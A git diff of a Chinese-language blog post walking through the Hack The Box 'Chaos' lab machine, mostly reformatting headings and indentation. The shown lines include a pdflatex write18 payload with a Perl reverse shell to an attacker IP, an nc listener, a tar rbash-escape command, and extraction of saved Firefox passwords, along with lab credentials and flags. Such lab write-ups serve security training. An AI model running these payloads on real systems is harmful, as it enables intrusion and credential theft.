--- a/_posts/2019-05-14-Chaos(HTB渗透测试).md
+++ b/_posts/2019-05-14-Chaos(HTB渗透测试).md
@@ -44,7 +44,7 @@ curl 10.10.10.120
 + dirb http://10.10.10.120 看看有啥发现 遍历web页面目录
   真有发现 找到了  http://10.10.10.120/wp 有东西 找到一个博客 http://10.10.10.120/wp/wordpress  里面要用户名和密码登录
    
-# 0x02
+## 0x02
 
 + 思路1
   在浏览器上输入?author=1就会发现下面出现了作者的名字 human。这时候我们就把名字输入Password里面去
@@ -91,7 +91,7 @@ curl 10.10.10.120
   DOWNLOADED: 13836 - FOUND: 3
 ``````
    
-# 0x03
+## 0x03
  + 连接imap openssl s_client -connect 10.10.10.120:993`
  + 输入 a LOGIN ayush jiujitsu
  + 这里的a是代号，顺便输入也行， LOGIN 是固定的，ayush是账号,jiujitsu是密码
@@ -156,7 +156,7 @@ c3QoKQoK
 tag OK Fetch completed (0.006 + 0.000 + 0.005 secs).
 ``````
 
-# 0x04
+## 0x04
 + 发现里面有两个文件，一个enim_msg.txt, 一个是 en.py 将这两个文件进行base64解码 
 
 + 第一个解码文件
@@ -168,8 +168,9 @@ tag OK Fetch completed (0.006 + 0.000 + 0.005 secs).
 ``````
 
 + 第二个解码文件 加密算法
+
 ``````
-def encrypt(key, filename):
+ def encrypt(key, filename):
     chunksize = 64*1024
     outputFile = "en" + filename
     filesize = str(os.path.getsize(filename)).zfill(16)
@@ -191,8 +192,8 @@ def encrypt(key, filename):
                     chunk += b' ' * (16 - (len(chunk) % 16))
 
                 outfile.write(encryptor.encrypt(chunk))
-
-def getKey(password):
+  
+  def getKey(password):
             hasher = SHA256.new(password.encode('utf-8'))
             return hasher.digest()
 ``````
@@ -210,7 +211,7 @@ SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAu
 
   可以用http//chaos.htb 访问 其实这里面就隐藏信息两个账户 sahay/ayush
 
-```
+``````
 base64 -d enim_msg_base64.txt
 Hii Sahay
 
@@ -222,19 +223,28 @@ http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
 
 Thanks,
 Ayush
-````
+``````
 
-# 0x05
+## 0x05
 + 打开浏览器登录 http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
-+ 来看下这个http地址有什么可以利用的信息，发现这是一个txt转pdf的插件，发现是pdflatex攻击，给出对应的[学习链接](https://0day.work/hacking-with-latex/)。点击create pdf，在创建pdf的同时会执行命令，直接反弹shell.
-+ 网页提示只有一个模板可以被使用，尝试后发现是test3模板，输入正文并点击生成按钮后，网页并不会有直接的提示，需要启用开发者模式获得结果，生成的pdf在路径http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/pdf/
++ 来看下这个http地址有什么可以利用的信息，发现这是一个txt转pdf的插件，
+
+  发现是pdflatex攻击，给出对应的[学习链接](https://0day.work/hacking-with-latex/)。
+
+  点击create pdf，在创建pdf的同时会执行命令，直接反弹shell.
++ 网页提示只有一个模板可以被使用，尝试后发现是test3模板，输入正文并点击生成按钮后，
+
+  网页并不会有直接的提示，需要启用开发者模式获得结果，生成的pdf在路径
+  
+  http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/pdf/
+
 + 对应的payload 需要修改自己的ip地址
 
 ``````
-\immediate\write18{perl -e 'use Socket;$i="10.10.14.37";$p=6666;
-socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
-if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
-open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'}
+  \immediate\write18{perl -e 'use Socket;$i="10.10.14.37";$p=6666;
+  socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
+  if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
+  open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'}
 ``````
 
 + 本机监听 nc -vnlp 6666 页面执行对应的payload 进入到www-data账户下 执行
@@ -247,15 +257,15 @@ Password:jiujitsu
 
 + 切换至ayush的会话中，但这是一个rbash，环境变量被设置在/home/ayush/.app中，拒绝了绝大多数的命令，
 
-经过尝试dir可以正常执行，在.app目录中有tar，这里使用tar来逃逸rbash，[学习链接](https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf)
+  经过尝试dir可以正常执行，在.app目录中有tar，这里使用tar来逃逸rbash，[学习链接](https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf)
 
-逃逸POC：tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
+  逃逸POC：tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
 
-获得正常bash后，添加环境变量export PATH=$PATH:/usr/bin/，打印出user.txt 
+  获得正常bash后，添加环境变量export PATH=$PATH:/usr/bin/，打印出user.txt 
 
 eef39126d9c3b4b8a30286970dc713e1
 
-# 0x06
+## 0x06
 + 尝试root权限 .Mozilla是否存放有有关root的密码
 + 路径/home/ayush/.mozilla/firefox/bzo7sjt1.default
 + 本地下载[GitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox/Thunderbird/Seabird) profiles](https://github.com/unode/firefox_decrypt) 利用nc上传到靶机
@@ -279,14 +289,14 @@ Password: 'Thiv8wrej~'
 + 切换root 获取root.txt
 4eca7e09e3520e020884563cfbabbc70
 
-# 0x07
+## 0x07
 + wp相关漏洞是否需要展开利用
 +  python -c 'import pty; pty.spawn("/bin/bash")'
 + tar 命令逃逸
 + sahay 账号密码也是Thiv8wrej~
 + grep "Direct " ./  -iRn
 
-# 0x08
+## 0x08
 参考：
 + [Chaos_HTB靶机渗透](https://hack4.fun/2019/04/Chaos-HTB%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/)
 + [HackTheBox Chaos - undefined](https://wingblog.github.io/2019/03/06/HackTheBox-Chaos/)
